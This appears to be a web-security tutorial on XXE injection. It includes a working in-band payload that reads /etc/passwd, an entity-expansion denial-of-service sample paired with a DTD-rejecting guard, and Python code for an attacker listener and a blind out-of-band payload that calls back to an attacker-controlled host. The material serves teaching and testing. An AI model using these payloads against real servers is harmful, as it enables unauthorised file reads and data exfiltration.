Exploitation
In-Band XXE Injection
In in-band XXE the application's response to the injected request is returned to the attacker, so the expanded entity (for example the contents of a local file) can be read directly from that response.
Out-of-Band XXE Injection
Out-of-band XXE refers to an XXE vulnerability where the attacker cannot see the result of the expansion in the server's response: the entity is resolved, but its value never appears in what the application returns. Exploitation therefore relies on a side channel, such as DNS or HTTP requests made by the vulnerable server to an attacker-controlled host, to confirm the vulnerability and exfiltrate data.
Example of In-Band XXE Injection
Here is a contact form.

I intercept the request via Burp Suite and see that the data is being sent via XML.

I declare an external entity in an inline DTD that points to the file /etc/passwd and reference it in the name field, as follows:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<contact>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</contact>
As the response above shows, the parser resolved the entity and returned the contents of /etc/passwd in place of the name field, so the injection worked.
XML Entity Expansion
XXE attacks rely on entities defined in the document's DTD, which the XML parser expands wherever they are referenced. Attackers abuse this in two ways: by declaring recursive or excessively large internal entities, so that a small document expands into a huge amount of data and causes a denial of service; or by declaring external (SYSTEM) entities that reference sensitive files or internal services. Entity expansion is central to both in-band and out-of-band XXE, because it is the mechanism that turns an injected declaration into a file read or an outbound request.
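The following is an added example, not code from the page: it shows the expansion side of this with Python's standard-library parser, which expands internal entities by default. The nested-entity document is constructed for the demonstration (three levels of ten references each, so one reference becomes 1000 copies of "lol"), and parse_hardened is a simple pre-parse guard, along the lines of defusedxml's forbid_dtd option, that rejects any document carrying a DOCTYPE or ENTITY declaration before the parser can expand anything. The function names and the sample document are assumptions introduced here.

```python
import xml.etree.ElementTree as ET

# Constructed sample (not from the page): three nested internal entities.
# Each level references the previous one ten times, so &lol3; expands to
# 10 * 10 * 10 = 1000 copies of "lol" (3000 characters) from a ~310-byte document.
NESTED_ENTITIES = """<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
"""


def expand_unsafely(xml_text: str) -> str:
    """Parse with the stdlib parser, which expands internal entities in full,
    and return the text content of the root element."""
    root = ET.fromstring(xml_text)
    return root.text or ""


def expansion_ratio(xml_text: str) -> float:
    """Output characters produced per input character: the amplification
    a denial-of-service payload achieves against this parser."""
    return len(expand_unsafely(xml_text)) / len(xml_text)


class DtdNotAllowed(ValueError):
    """Raised when a document declares a DTD and is therefore refused."""


def parse_hardened(xml_text: str) -> ET.Element:
    """Refuse any document that carries a DTD before it reaches the parser.
    Without a DOCTYPE there can be no entity declarations, so neither
    expansion bombs nor SYSTEM entities (file:// or http://) are possible.
    XML keywords are case-sensitive, so matching the uppercase forms is enough;
    a false positive on a comment containing the keyword simply fails closed."""
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise DtdNotAllowed("DTD / entity declarations are not accepted")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    expanded = expand_unsafely(NESTED_ENTITIES)
    print(f"input {len(NESTED_ENTITIES)} chars -> output {len(expanded)} chars "
          f"(x{expansion_ratio(NESTED_ENTITIES):.1f})")
    try:
        parse_hardened(NESTED_ENTITIES)
    except DtdNotAllowed as exc:
        print("hardened parser:", exc)
    # A plain document without a DTD still parses normally.
    print(parse_hardened("<contact><name>test</name></contact>").find("name").text)
```

Adding a fourth and fifth level to the sample multiplies the output by ten each time; the guard does not care, because it never lets the parser see the declarations at all.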
Example of Out-of-Band XXE Injection
Here the injection shows no result on the user side, so the exfiltrated data has to be received by an attacker-controlled server instead.
Here I have the following page.

Now to receive the data I will start a Python HTTP server on port 1234.
I uploaded a file and captured the resulting request in Burp Suite; it looks as follows once forwarded.

Here I replaced the URL in the external entity with the address of my machine (where the listener on port 1234 is running), as follows.

Now when I submit this request, a request arrives at my HTTP server. This confirms that the server's XML parser resolves external entities and will reach out to attacker-controlled hosts, which is what makes out-of-band exfiltration possible. A bare callback like this only proves the vulnerability: to actually carry file contents out of band, the data has to end up in the URL the server requests, so the listener should log the full request path and query string rather than just the fact that a connection arrived.
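The following is an added example, not code from the page: the attacker side of the out-of-band check, written as a small listener that records every request path (so data placed in the URL is captured, not just the connection), plus a builder for the blind probe payload. Because Python's standard-library parser does not resolve SYSTEM entities, simulate_vulnerable_parser stands in for the server-side parser by fetching the entity URL itself; the upload/filename element names, the xxe-probe marker and the function names are assumptions made for the demonstration.

```python
import re
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Every request the vulnerable server makes to us is recorded here as
# (client address, request path). The path carries whatever the payload
# put in the URL, which is where exfiltrated data would show up.
received = []


class CallbackHandler(BaseHTTPRequestHandler):
    """Record each request and answer 200 so the remote parser does not error."""

    def do_GET(self):
        received.append((self.client_address[0], self.path))
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):
        # Keep the console quiet; the `received` list is the record.
        pass


def start_listener(host="127.0.0.1", port=0):
    """Start the attacker-side HTTP listener in a background thread.
    Port 0 asks the OS for a free port; use 1234 to mirror the page."""
    server = HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def build_oob_payload(callback_url: str, marker: str = "xxe-probe") -> str:
    """Blind XXE probe (constructed, hypothetical target schema): the entity body
    is fetched from our listener, so a hit proves the parser resolves external
    entities even though nothing is reflected in the application's response."""
    url = callback_url.rstrip("/") + "/" + urllib.parse.quote(marker)
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE upload [\n'
        f'<!ENTITY xxe SYSTEM "{url}">\n'
        ']>\n'
        '<upload><filename>&xxe;</filename></upload>\n'
    )


def simulate_vulnerable_parser(payload: str, timeout: float = 3.0) -> int:
    """Stand-in for a server-side parser that resolves SYSTEM entities: pull the
    entity URL out of the DTD and fetch it. Proxies are disabled so the loopback
    request is not routed through an http_proxy environment setting."""
    url = re.search(r'SYSTEM\s+"([^"]+)"', payload).group(1)
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url, timeout=timeout) as resp:
        return resp.status


def callback_marker(path: str) -> str:
    """Decode the marker (or exfiltrated data) from a received request path."""
    return urllib.parse.unquote(path.lstrip("/"))


if __name__ == "__main__":
    srv = start_listener(port=1234)
    listener_url = f"http://127.0.0.1:{srv.server_address[1]}"
    payload = build_oob_payload(listener_url)
    print(payload)
    simulate_vulnerable_parser(payload)
    for client, path in received:
        print(f"callback from {client}: {callback_marker(path)}")
    srv.shutdown()
```

In a real engagement the payload is pasted into the intercepted request in Burp Suite and the listener runs on a host the target can reach; the simulate_vulnerable_parser step is replaced by the target's own parser.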